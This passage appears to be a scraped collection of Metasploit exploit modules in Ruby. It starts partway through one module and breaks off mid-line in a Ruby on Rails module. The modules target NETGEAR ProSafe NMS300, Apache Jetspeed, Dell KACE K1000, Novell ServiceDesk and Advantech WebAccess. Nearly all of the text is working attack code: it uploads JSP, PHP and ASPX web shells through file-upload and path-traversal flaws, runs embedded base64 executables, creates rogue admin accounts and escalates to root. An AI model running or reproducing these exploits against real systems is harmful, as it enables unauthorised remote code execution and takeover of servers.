<% ByteArrayOutputStream buf = new ByteArrayOutputStream(); BufferedReader reader = request.getReader(); int tmp; while ((tmp = reader.read()) != -1) { buf.write(tmp); } FileOutputStream fostream = new FileOutputStream("#{exe_name}"); buf.writeTo(fostream); fostream.close(); Runtime.getRuntime().exec("#{exe_name}"); %>| # Since we're sending it as a GET request, we want to keep it smaller so # we gsub stuff we don't want. jsp.gsub!("\n", '') jsp.gsub!(' ', ' ') Rex::Text.uri_encode(jsp) end def upload_stager(stager_name, exe_name) # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug) jsp_stager = get_jsp_stager(exe_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp') send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'encode_params' => false, # Don't encode %00 for us 'vars_post' => { 'sess' => "..\\#{stager_name}%00", 'recxml' => jsp_stager, 'audiopath' => Rex::Text.rand_text_alpha(1), 'wavfile' => "#{Rex::Text.rand_text_alpha(5)}.wav", 'evaluation' => Rex::Text.rand_text_alpha(1) } }) end def upload_payload(stager_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'data' => generate_payload_exe(code: payload.encoded) }) end def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end end
  10. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', 'Description' => %q{ Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file upload vulnerability that can be exploited by an unauthenticated remote attacker to execute code as the SYSTEM user. Two servlets are vulnerable, FileUploadController (located at /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-1525'], ['US-CERT-VU', '777024'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => true, 'Targets' => [ [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 4 2016')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, "Application path", '/']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'GET' }) if res && res.code == 405 Exploit::CheckCode::Detected else Exploit::CheckCode::Safe end end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) payload_name = rand_text_alpha(rand(6)+3) var_raw = 'a' + rand_text_alpha(rand(8) + 3) var_ostream = 'b' + rand_text_alpha(rand(8) + 3) var_buf = 'c' + rand_text_alpha(rand(8) + 3) var_decoder = 'd' + rand_text_alpha(rand(8) + 3) var_tmp = 'e' + rand_text_alpha(rand(8) + 3) var_path = 'f' + rand_text_alpha(rand(8) + 3) var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) { } %> | jsp.gsub!(/[\n\t\r]/, '') return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) jsp_full_name = "null#{jsp_name}.jsp" post_data = Rex::MIME::Message.new post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') post_data.add_part(jsp_payload, "application/octet-stream", 'binary', "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") data = post_data.to_s print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/ print_status("#{peer} - Payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), 'method' => 'GET' }) handler end end
  11. Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Jetspeed Arbitrary File Upload', 'Description' => %q{ This module exploits the unsecured User Manager REST API and a ZIP file path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier versions, to upload and execute a shell. Note: this exploit will create, use, and then delete a new admin user. Warning: in testing, exploiting the file upload clobbered the web interface beyond repair. No workaround has been found yet. Use this module at your own risk. No check will be implemented. }, 'Author' => [ 'Andreas Lindh', # Vulnerability discovery 'wvu' # Metasploit module ], 'References' => [ ['CVE', '2016-0710'], ['CVE', '2016-0709'], ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'], ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'], ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710'] ], 'DisclosureDate' => 'Mar 6 2016', 'License' => MSF_LICENSE, 'Platform' => ['linux', 'win'], 'Arch' => ARCH_JAVA, 'Privileged' => false, 'Targets' => [ ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'], ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win'] ], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(8080) ]) end def print_status(msg='') super("#{peer} - #{msg}") end def print_warning(msg='') super("#{peer} - #{msg}") end def exploit print_status("Creating admin user: #{username}:#{password}") create_admin_user # This was originally a typo... but we're having so much fun! print_status('Kenny Loggins in') kenny_loggins print_warning('You have entered the Danger Zone') print_status("Uploading payload ZIP: #{zip_filename}") upload_payload_zip print_status("Executing JSP shell: /jetspeed/#{jsp_filename}") exec_jsp_shell end def cleanup print_status("Deleting user: #{username}") delete_user super end # # Exploit methods # def create_admin_user send_request_cgi( 'method' => 'POST', 'uri' => '/jetspeed/services/usermanager/users', 'vars_post' => { 'name' => username, 'password' => password, 'password_confirm' => password } ) send_request_cgi( 'method' => 'POST', 'uri' => "/jetspeed/services/usermanager/users/#{username}", 'vars_post' => { 'user_enabled' => 'true', 'roles' => 'admin' } ) end def kenny_loggins res = send_request_cgi( 'method' => 'GET', 'uri' => '/jetspeed/login/redirector' ) res = send_request_cgi!( 'method' => 'POST', 'uri' => '/jetspeed/login/j_security_check', 'cookie' => res.get_cookies, 'vars_post' => { 'j_username' => username, 'j_password' => password } ) @cookie = res.get_cookies end # Let's pretend we're mechanize def import_file res = send_request_cgi( 'method' => 'GET', 'uri' => '/jetspeed/portal/Administrative/site.psml', 'cookie' => @cookie ) html = res.get_html_document import_export = html.at('//a[*//text() = "Import/Export"]/@href') res = send_request_cgi!( 'method' => 'POST', 'uri' => import_export, 'cookie' => @cookie ) html = res.get_html_document html.at('//form[*//text() = "Import File"]/@action') end def upload_payload_zip zip = Rex::Zip::Archive.new zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded) mime = Rex::MIME::Message.new mime.add_part(zip.pack, 'application/zip', 'binary', %Q{form-data; name="fileInput"; filename="#{zip_filename}"}) mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"') mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"') case target['Platform'] when 'linux' register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}") register_files_for_cleanup("../temp/#{username}/#{zip_filename}") when 'win' register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}") register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}") end send_request_cgi( 'method' => 'POST', 'uri' => import_file, 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'cookie' => @cookie, 'data' => mime.to_s ) end def exec_jsp_shell send_request_cgi( 'method' => 'GET', 'uri' => "/jetspeed/#{jsp_filename}", 'cookie' => @cookie ) end # # Cleanup methods # def delete_user send_request_cgi( 'method' => 'DELETE', 'uri' => "/jetspeed/services/usermanager/users/#{username}" ) end # XXX: This is a hack because FileDropper doesn't delete directories def on_new_session(session) super case target['Platform'] when 'linux' print_status("Deleting user temp directory: ../temp/#{username}") session.shell_command_token("rm -rf ../temp/#{username}") when 'win' print_status("Deleting user temp directory: ..\\temp\\#{username}") session.shell_command_token("rd /s /q ..\\temp\\#{username}") end end # # Utility methods # def username @username ||= Rex::Text.rand_text_alpha_lower(8) end def password @password ||= Rex::Text.rand_text_alphanumeric(8) end def jsp_filename @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' end def zip_filename @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' end end
  12. Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Dell KACE K1000 File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Kace K1000 versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547 which allows unauthenticated users to execute arbitrary commands under the context of the 'www' user. This module also abuses the 'KSudoClient::RunCommandWait' function to gain root privileges. This module has been tested successfully with Dell KACE K1000 version 5.3. }, 'License' => MSF_LICENSE, 'Privileged' => true, 'Platform' => 'unix', # FreeBSD 'Arch' => ARCH_CMD, 'Author' => [ 'Bradley Austin (steponequit)', # Initial discovery and exploit 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit ], 'References' => [ ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html'] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x27", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl' } }, 'DefaultTarget' => 0, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'DisclosureDate' => 'Mar 7 2014')) end def check res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php')) unless res vprint_error('Connection failed') return Exploit::CheckCode::Unknown end if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000' if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/ vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}") if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.3 return Exploit::CheckCode::Vulnerable elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.76849 return Exploit::CheckCode::Vulnerable elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.90547 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit # upload payload fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php" payload_path = "/kbox/kboxwww/tmp/" post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>" print_status("Uploading #{fname} (#{post_data.length} bytes)") res = send_request_cgi( 'uri' => normalize_uri('service', 'kbot_upload.php'), 'method' => 'POST', 'vars_get' => Hash[{ 'filename' => fname, 'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}", 'checksum' => 'SCRAMBLE', 'mac' => rand_text_alphanumeric(rand(8) + 5), 'kbotId' => rand_text_alphanumeric(rand(8) + 5), 'version' => rand_text_alphanumeric(rand(8) + 5), 'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle], 'data' => post_data) unless res fail_with(Failure::Unreachable, 'Connection failed') end if res.code && res.code == 200 print_good('Payload uploaded successfully') else fail_with(Failure::UnexpectedReply, 'Unable to upload payload') end # execute payload res = send_request_cgi('uri' => normalize_uri('tmp', fname)) unless res fail_with(Failure::Unreachable, 'Connection failed') end if res.code && res.code == 200 print_good('Payload executed successfully') elsif res.code && res.code == 404 fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'") else fail_with(Failure::UnexpectedReply, 'Unable to execute payload') end end end
  13. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ServiceDesk Authenticated File Upload', 'Description' => %q{ This module exploits an authenticated arbitrary file upload via directory traversal to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in Windows and Linux installations of Novell ServiceDesk, as well as the Virtual Appliance provided by Novell. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-1593' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ], [ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ] ], 'Platform' => %w{ linux win }, 'Arch' => ARCH_X86, 'DefaultOptions' => { 'WfsDelay' => 15 }, 'Targets' => [ [ 'Automatic', {} ], [ 'Novell ServiceDesk / Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], [ 'Novell ServiceDesk / Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'Privileged' => false, # Privileged on Windows but not on (most) Linux targets 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 30 2016' )) register_options( [ OptPort.new('RPORT', [true, 'The target port', 80]), OptString.new('USERNAME', [true, 'The username to login as', 'admin']), OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']), OptString.new('TRAVERSAL_PATH', [false, 'Traversal path to tomcat/webapps/LiveTime/']) ], self.class) end def get_version res = send_request_cgi({ 'uri' => normalize_uri('LiveTime','WebObjects','LiveTime.woa'), 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', } }) if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/ return $1.to_f else return 999 end end def check version = get_version if version <= 7.1 && version >= 6.5 return Exploit::CheckCode::Appears elsif version > 7.1 return Exploit::CheckCode::Safe else return Exploit::CheckCode::Unknown end end def pick_target return target if target.name != 'Automatic' print_status("#{peer} - Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} traversal_paths = [] if datastore['TRAVERSAL_PATH'] traversal_paths << datastore['TRAVERSAL_PATH'] # add user specified or default Virtual Appliance path end # add Virtual Appliance path plus the traversal in a Windows or Linux self install traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/']) # test each path to determine OS (and correct path) traversal_paths.each do |traversal_path| jsp_name = upload_jsp(traversal_path, os_finder_payload) res = send_request_cgi({ 'uri' => normalize_uri('LiveTime', jsp_name), 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies }) if res && res.code == 200 if res.body.to_s =~ /Windows/ @my_target = targets[2] else # Linux here @my_target = targets[1] end if traversal_path.include? '/srv/tomcat6/webapps/' register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) else register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) end return traversal_path end end return nil end def upload_jsp(traversal_path, jsp) jsp_name = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp" post_data = Rex::MIME::Message.new post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"") data = post_data.to_s res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@upload_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if not res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...") else return jsp_name end end def create_jsp opts = {:arch => @my_target.arch, :platform => @my_target.platform} payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch) exe = generate_payload_exe(opts) base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(rand(6)+3) ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) var_path = Rex::Text.rand_text_alpha(rand(8) + 3) var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) if @my_target['Platform'] == 'linux' var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); | else chmod = '' cleanup = '' end jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/\n/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, "") jsp = jsp.gsub(/\x0a/, "") return jsp end def exploit version = get_version # 1: get the cookies, the login_url and the password_form and username form names (they varies between versions) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', } }) if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ login_url = $2 @cookies = res.get_cookies if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/ password_form = $1 else # we shouldn't hit this condition at all, this is default for v7+ password_form = 'password' end if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/ username_form = $1 else # we shouldn't hit this condition at all, this is default for v7+ username_form = 'username' end else fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.") end # 2: authenticate and get the import_url res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(login_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'vars_post' => { username_form => datastore['USERNAME'], password_form => datastore['PASSWORD'], 'ButtonLogin' => 'Login' } }) if res && res.code == 200 && (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5 import_url = $1 else # hmm either the password is wrong or someone else is using "our" account.. . # let's try to boot him out if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ && res.body.to_s =~ /This account is in use on another system/ res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(login_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'vars_post' => { username_form => datastore['USERNAME'], password_form => datastore['PASSWORD'], 'ButtonLoginOverride' => 'Login' } }) if res && res.code == 200 && (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5 import_url = $1 else fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") end else fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") end end # 3: get the upload_url res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(import_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'vars_post' => { 'ButtonImport' => 'Import' } }) if res && res.code == 200 && (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/) # v6.5 @upload_url = $1 else fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.") end if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/ @upload_form = $1 else # go with the default for 7.1.0, might not work with other versions... @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23" end # 4: target selection @my_target = nil # pick_target returns the traversal_path and sets @my_target traversal_path = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") else print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") end # 5: generate the JSP with the payload jsp = create_jsp print_status("#{peer} - Uploading payload...") jsp_name = upload_jsp(traversal_path, jsp) if traversal_path.include? '/srv/tomcat6/webapps/' register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) else register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) end # 6: pwn it! print_status("#{peer} - Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)}) handler end end
  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to upload arbitrary code (instead of an image) to the server, which will then be executed under the high-privilege context of the IIS AppPool. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod', # Vulnerability discovery 'Zhou Yu <504137480[at]qq.com>' # MSF module ], 'References' => [ [ 'CVE', '2016-0854' ], [ 'ZDI', '16-128' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01'] ], 'Platform' => 'win', 'Targets' => [ ['Advantech WebAccess 8.0', {}] ], 'Privileged' => false, 'DisclosureDate' => "Feb 5 2016", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/']) ], self.class) end def version_match(data) # Software Build : 8.0-2015.08.15 fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/) fingerprint['version'] unless fingerprint.nil? end def vuln_version? res = send_request_cgi( 'method' => 'GET', 'uri' => target_uri.to_s ) if res.redirect? res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(res.redirection) ) end ver = res && res.body ? version_match(res.body) : nil true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false end def check if vuln_version? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def upload_file?(filename, file) uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx') data = Rex::MIME::Message.new data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"') data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"") res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'cookie' => "waUserName=admin", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false end def exec_file?(filename) uri = normalize_uri(target_uri) res = send_request_cgi( 'method' => 'GET', 'uri' => uri ) uri = normalize_uri(target_uri, 'WADashboard', filename) res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => res.get_cookies ) true ? res && res.code == 200 : false end def exploit unless vuln_version? print_status("#{peer} - Cannot reliably check exploitability.") return end filename = "#{Rex::Text.rand_text_alpha(5)}.aspx" filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe) print_status("#{peer} - Uploading malicious file...") return unless upload_file?(filename, filedata) print_status("#{peer} - Executing #{filename}...") return unless exec_file?(filename) end end
  15. require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths, such as the following example: def show render params[:id] end Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This module doesnt use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution. }, 'Author' => [ 'mr_me <[email protected]>', # necromanced old bug & discovered new vector rce vector 'John Poulin (forced-request)' # original render bug finder ], 'References' => [ [ 'CVE', '2016-0752'], [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit ], 'License' => MSF_LICENSE, 'Platform' => ['linux', 'bsd'], 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true, }, 'Privileged' => false, 'Targets' => [ [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2016')) register_options( [ Opt::RPORT(3000), OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), ], self.class) end def check # this is the check for the dev environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2f"), 'method' => 'GET', }, 60) # if the page controller is dynamically rendering, its for sure vuln if res and res.body =~ /render params/ return CheckCode::Vulnerable end # this is the check for the prod environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"), 'method' => 'GET', }, 60) # if we can read files, its likley we can execute code if res and res.body =~ /ruby/ return CheckCode::Appears end return CheckCode::Safe end def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end def send_payload @bd = 